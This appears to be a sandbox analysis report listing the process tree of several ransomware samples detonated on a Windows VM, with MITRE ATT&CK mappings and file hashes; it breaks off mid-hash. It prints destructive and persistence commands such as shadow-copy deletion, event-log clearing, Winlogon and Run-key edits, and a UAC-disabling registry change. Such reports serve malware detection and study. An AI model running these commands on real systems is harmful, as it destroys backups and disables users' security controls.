  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
  2⤵
  PID:4844
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7468 /prefetch:1
  2⤵
  PID:1492
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=11708 /prefetch:8
  2⤵
  PID:6520
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5872 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5756
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7696 /prefetch:8
  2⤵
  PID:1016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=11696 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5748
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7660 /prefetch:1
  2⤵
  PID:1720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7040 /prefetch:8
  2⤵
  PID:6896
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=12060 /prefetch:8
  2⤵
  PID:2944
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10052 /prefetch:8
  2⤵
  PID:4872
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=12268 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6616
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=10552 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5984
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1864 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4908
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
  2⤵
  PID:27636
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2084,13920762015797840211,6050634042663046995,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11032 /prefetch:1
  2⤵
  PID:31616

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:1396

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4992

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4576

C:\Users\Public\Desktop\@[email protected]
"C:\Users\Public\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- Sets desktop wallpaper using registry
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
PID:4364

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4908

C:\Windows\SysWOW64\werfault.exe
werfault.exe /h /shared Global\79114d9a975b4afaac14f6f2893cb39d /t 556 /p 4364
1⤵
PID:4856

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Public\Desktop\@[email protected]"
1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:3400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DeviceAssociationService
1⤵
PID:1928

C:\Users\Public\Desktop\@[email protected]
"C:\Users\Public\Desktop\@[email protected]"
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3916

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x308 0x530
1⤵
PID:3624

C:\Users\Admin\Downloads\Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe
"C:\Users\Admin\Downloads\Emsisoft_Decryptor_for_STOP_Djvu_v1.0.0.5.exe"
1⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
PID:2072

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaulta39cc9a4h75e5h4feeh90d5haf6349c932db
1⤵
PID:4816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0x40,0x12c,0x7ffbbba346f8,0x7ffbbba34708,0x7ffbbba34718
  2⤵
  PID:3716
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2088,11917980712111367937,18068633962221447351,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2116 /prefetch:2
  2⤵
  PID:6284
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2088,11917980712111367937,18068633962221447351,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:6292

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefault80030d8bh259dh48fch9eaah9c77651aaf40
1⤵
PID:6648
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffbbba346f8,0x7ffbbba34708,0x7ffbbba34718
  2⤵
  PID:6672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,10846418160723145354,15662581185265134970,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 /prefetch:3
  2⤵
  PID:6932

C:\Users\Admin\Downloads\$uckyLocker.exe
"C:\Users\Admin\Downloads\$uckyLocker.exe"
1⤵
- Sets desktop wallpaper using registry
PID:6332

C:\Users\Admin\Downloads\7ev3n.exe
"C:\Users\Admin\Downloads\7ev3n.exe"
1⤵
- NTFS ADS
PID:6416
- C:\Users\Admin\AppData\Local\system.exe
  "C:\Users\Admin\AppData\Local\system.exe"
  2⤵
  PID:1372
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
    3⤵
    PID:4500
- - C:\Windows\SysWOW64\SCHTASKS.exe
    C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:7076
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    PID:1144
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Modifies WinLogon for persistence
      PID:3944
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
    3⤵
    PID:3540
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
      4⤵
      Adds Run key to start application
      PID:5528
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
    3⤵
    PID:5052
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
      4⤵
      PID:6224
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
    3⤵
    PID:5116
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
      4⤵
      PID:6240
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
    3⤵
    PID:3708
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:4536
- - C:\windows\SysWOW64\cmd.exe
    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
    3⤵
    PID:3636
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
      4⤵
      UAC bypass
      PID:3900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
    3⤵
    PID:6536
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
      4⤵
      PID:2900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
    3⤵
    PID:4792
  - - C:\Windows\SysWOW64\shutdown.exe
      shutdown -r -t 10 -f
      4⤵
      PID:4500

C:\Users\Admin\Downloads\Annabelle.exe
"C:\Users\Admin\Downloads\Annabelle.exe"
1⤵
PID:4480

C:\Users\Admin\Downloads\BadRabbit.exe
"C:\Users\Admin\Downloads\BadRabbit.exe"
1⤵
- Drops file in Windows directory
PID:7052
- C:\Windows\SysWOW64\rundll32.exe
  C:\Windows\system32\rundll32.exe C:\Windows\infpub.dat,#1 15
  2⤵
  - Loads dropped DLL
  - Drops file in Windows directory
  - Suspicious behavior: EnumeratesProcesses
  PID:692
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Delete /F /TN rhaegal
    3⤵
    PID:6288
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Delete /F /TN rhaegal
      4⤵
      PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2739046904 && exit"
    3⤵
    PID:6932
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /RU SYSTEM /SC ONSTART /TN rhaegal /TR "C:\Windows\system32\cmd.exe /C Start \"\" \"C:\Windows\dispci.exe\" -id 2739046904 && exit"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1524
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 20:27:00
    3⤵
    PID:6820
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /Create /SC once /TN drogon /RU SYSTEM /TR "C:\Windows\system32\shutdown.exe /r /t 0 /f" /ST 20:27:00
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1492
- - C:\Windows\E2A1.tmp
    "C:\Windows\E2A1.tmp" \\.\pipe\{B2EF09DE-15DB-49E1-A739-766D02B5B321}
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6060
- - C:\Windows\SysWOW64\cmd.exe
    /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
    3⤵
    PID:32736
- - C:\Windows\SysWOW64\cmd.exe
    /c schtasks /Delete /F /TN drogon
    3⤵
    PID:24736

C:\Users\Admin\Downloads\Birele.exe
"C:\Users\Admin\Downloads\Birele.exe"
1⤵
- Modifies WinLogon for persistence
- Impair Defenses: Safe Mode Boot
- Adds Run key to start application
PID:6068
- C:\Windows\SysWOW64\taskkill.exe
  taskkill /F /IM explorer.exe
  2⤵
  - Kills process with taskkill
  PID:1388

C:\Users\Admin\Downloads\Cerber5.exe
"C:\Users\Admin\Downloads\Cerber5.exe"
1⤵
- Enumerates connected drives
PID:3812
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall set allprofiles state on
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:6728
- C:\Windows\SysWOW64\netsh.exe
  C:\Windows\system32\netsh.exe advfirewall reset
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  PID:4792

C:\Users\Admin\Downloads\CoronaVirus.exe
"C:\Users\Admin\Downloads\CoronaVirus.exe"
1⤵
- Drops startup file
- Adds Run key to start application
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
PID:1112
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe"
  2⤵
  PID:628
- - C:\Windows\system32\mode.com
    mode con cp select=1251
    3⤵
    PID:32952
- - C:\Windows\system32\vssadmin.exe
    vssadmin delete shadows /all /quiet
    3⤵
    - Interacts with shadow copies
    PID:10708

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa3818855 /state1:0x41c64e6d
1⤵
PID:10640

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Windows Management Instrumentation

T1047

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Direct Volume Access

T1006

File and Directory Permissions Modification

T1222

Windows File and Directory Permissions Modification

T1222.001

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Disable or Modify Tools

T1562.001

Safe Mode Boot

T1562.009

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Network Service Discovery

T1046

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\7-Zip\7z.dll.id-DC6DCDB9.[[email protected]].ncov

Filesize
2.5MB

MD5
ca78910af62fb6c4843de8ccff099601

SHA1
4949d071c58776879cbef70e77a9cff9d20ee53d

SHA256
e119e6e1e4b49531496a46831ab0b5645654ff380d4f862b7a2d8653b7ac4b89

SHA512
aaad2b6a72e4bef2f072adea69b15b70fca181b05b55acadd0e14cd144eb60c2f369752e2fee706b3088eefc905056167984f5edef11ddf8cafdce5bfc1f323c

Download Submit
C:\ProgramData\Adobe\Setup\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\@[email protected]

Filesize
585B

MD5
2a8ebc0f637ffb44240a732e28adac8f

SHA1
abe145c56c1b5376a3f97ca0e09a5ff3f2f95cb8

SHA256
91e0d501be3cb51b02920e9992e028ea2d23803df792906736adf539dfccf876

SHA512
44354a5e54222809b9d87c51b1d2741002f227cf7d6005cb163e99597f43c7f1c1c7f4d62b1aa8e354d640c1f384ffb9ac3e8166e27119ee5b40be64a87532d2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
f0f818d52a59eb6cf9c4dd2a1c844df9

SHA1
26afc4b28c0287274624690bd5bd4786cfe11d16

SHA256
58c0beea55fecbeded2d2c593473149214df818be1e4e4a28c97171dc8179d61

SHA512
7e8a1d3a6c8c9b0f1ac497e509e9edbe9e121df1df0147ce4421b8cf526ad238bd146868e177f9ce02e2d8f99cf7bb9ce7db4a582d487bbc921945211a977509

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
0331fa75ac7846bafcf885ea76d47447

SHA1
5a141ffda430e091153fefc4aa36317422ba28ae

SHA256
64b4b2e791644fc04f164ecd13b8b9a3e62669896fb7907bf0a072bbeebaf74a

SHA512
f8b960d38d73cf29ce17ea409ef6830cae99d7deafaf2ff59f8347120d81925ff16e38faaa0f7f4c39936472d05d1d131df2a8a383351f138c38afb21c1a60e2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
982d79c56a1c24338bb257728ad39519

SHA1
f5500b0afb526d08f75ada9afbd03e3fdec20c06

SHA256
7dc4e0f4db6e670eeaf0678d71994fbcc647fab636e1d0001af7632ec524e728

SHA512
62d4fc3f8ce77455dd13d75d7bce1760be6429482041199c17c35d0e0008f8b843527cef11ea22b744820eeb2cdbfc0959481e5d3eb613eb8b5155cd07a02164

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
6f59f4933867eb943f7e0f193720b4e9

SHA1
47105e52e5e43c9a1426b044e194524fa3b44ff3

SHA256
764302e7a7135fd4d98e507215ebb05a633c1ee97801ac554ba0b8babfb773a2

SHA512
a69e93acd7849dceb05f016dda2fe477f7d4f49d1749f9793df0f5ceb119b100677bf3688e49fd89392b8d12c377e1ea500136c63a0e12458b65a90fa6b2cf94

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000006

Filesize
67KB

MD5
9e3f75f0eac6a6d237054f7b98301754

SHA1
80a6cb454163c3c11449e3988ad04d6ad6d2b432

SHA256
33a84dec02c65acb6918a1ae82afa05664ee27ad2f07760e8b008636510fd5bf

SHA512
5cea53f27a4fdbd32355235c90ce3d9b39f550a1b070574cbc4ea892e9901ab0acace0f8eeb5814515ca6ff2970bc3cc0559a0c87075ac4bb3251bc8eaee6236

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000007

Filesize
64KB

MD5
d6b36c7d4b06f140f860ddc91a4c659c

SHA1
ccf16571637b8d3e4c9423688c5bd06167bfb9e9

SHA256
34013d7f3f0186a612bef84f2984e2767b32c9e1940df54b01d5bd6789f59e92

SHA512
2a9dd9352298ec7d1b439033b57ee9a390c373eeb8502f7f36d6826e6dd3e447b8ffd4be4f275d51481ef9a6ac2c2d97ef98f3f9d36a5a971275bf6cee48e487

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000008

Filesize
41KB

MD5
3358e831188c51a7d8c6be54efafc248

SHA1
4b909f88f7b6d0a633824e354185748474a902a5

SHA256
c4cd0c2e26c152032764362954c276c86bd51e525a742d1f86b3e4f860f360ff

SHA512
c96a6aae518d99be0c184c70be83a6a21fca3dab82f028567b224d7ac547c5ef40f0553d56f006b53168f9bba1637fdec8cf79175fd03c9c954a16c62a9c935e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000009

Filesize
19KB

MD5
2e86a72f4e82614cd4842950d2e0a716

SHA1
d7b4ee0c9af735d098bff474632fc2c0113e0b9c

SHA256
c1334e604dbbffdf38e9e2f359938569afe25f7150d1c39c293469c1ee4f7b6f

SHA512
7a5fd3e3e89c5f8afca33b2d02e5440934e5186b9fa6367436e8d20ad42b211579225e73e3a685e5e763fa3f907fc4632b9425e8bd6d6f07c5c986b6556d47b1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000a

Filesize
65KB

MD5
56d57bc655526551f217536f19195495

SHA1
28b430886d1220855a805d78dc5d6414aeee6995

SHA256
f12de7e272171cda36389813df4ba68eb2b8b23c58e515391614284e7b03c4d4

SHA512
7814c60dc377e400bbbcc2000e48b617e577a21045a0f5c79af163faa0087c6203d9f667e531bbb049c9bd8fb296678e6a5cdcad149498d7f22ffa11236b51cb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000b

Filesize
88KB

MD5
b38fbbd0b5c8e8b4452b33d6f85df7dc

SHA1
386ba241790252df01a6a028b3238de2f995a559

SHA256
b18b9eb934a5b3b81b16c66ec3ec8e8fecdb3d43550ce050eb2523aabc08b9cd

SHA512
546ca9fb302bf28e3a178e798dd6b80c91cba71d0467257b8ed42e4f845aa6ecb858f718aac1e0865b791d4ecf41f1239081847c75c6fb3e9afd242d3704ad16

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000c

Filesize
1.2MB

MD5
620dd00003f691e6bda9ff44e1fc313f

SHA1
aaf106bb2767308c1056dee17ab2e92b9374fb00

SHA256
eea7813cba41e7062794087d5d4c820d7b30b699af3ec37cb545665940725586

SHA512
3e245851bfa901632ea796ddd5c64b86eda217ec5cd0587406f5c28328b5cb98c5d8089d868e409e40560c279332ba85dd8ce1159ae98e8588e35ed61da2f006

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000e

Filesize
43KB

MD5
209af4da7e0c3b2a6471a968ba1fc992

SHA1
2240c2da3eba4f30b0c3ef2205ce7848ecff9e3f

SHA256
ecc145203f1c562cae7b733a807e9333c51d75726905a3af898154f3cefc9403

SHA512
09201e377e80a3d03616ff394d836c85712f39b65a3138924d62a1f3ede3eac192f1345761c012b0045393c501d48b5a774aeda7ab5d687e1d7971440dc1fc35

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_00000f

Filesize
73KB

MD5
7322a4b055089c74d35641df8ed19efa

SHA1
